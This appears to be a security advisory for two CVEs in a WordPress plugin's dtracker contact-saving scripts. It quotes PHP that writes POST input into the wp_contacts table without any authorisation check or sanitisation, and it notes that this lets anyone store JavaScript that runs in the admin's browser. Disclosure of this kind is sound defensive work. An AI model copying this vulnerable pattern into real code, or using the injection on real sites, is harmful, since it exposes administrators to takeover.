CVE-2017-1002006: In file dtracker/save_contact.php Doesn't check that the user is authorized before injecting new contacts into the wp_contact table. A simple post request will allow any user to add new contacts. A malicious user could inject javascript into the database to be executed in the browser of the admin user. $name = $_POST['name']; $company = $_POST['company']; $phone = $_POST['phone']; $country = $_POST['country']; $contact_id = $_POST['contact_id']; $table = 'wp_contacts'; $data = array( 'name' => $name, 'company' => $company, 'phone' => $phone, 'country' => $country, ); $where = array( 'id' => $contact_id ); $wpdb->flush(); $wpdb->update( $table, $data, $where ); //Update the Contact CVE-2017-1002007: In file dtracker/save_mail.php Doesn't check that the user is authorized before injecting new emails into the wp_contact table. A simple post request will allow any user to add new contacts. A malicious user could inject javascript into the database to be executed in the browser of the admin user. $email = $_POST['email']; $time = date('Y-m-d H:i:s'); $ip = $_SERVER [ 'REMOTE_ADDR' ] ; //get IP address of the visitor $table = "wp_contacts"; $data = array ( 'email' => $email, 'time' => $time, 'ip' => $ip ); $wpdb->insert( $table, $data); //Insert Values $contact_id = $wpdb->insert_id; //Get ID of the last inserted row $data['contactId'] = $contact_id; echo json_encode($data); //Pass the id to the JS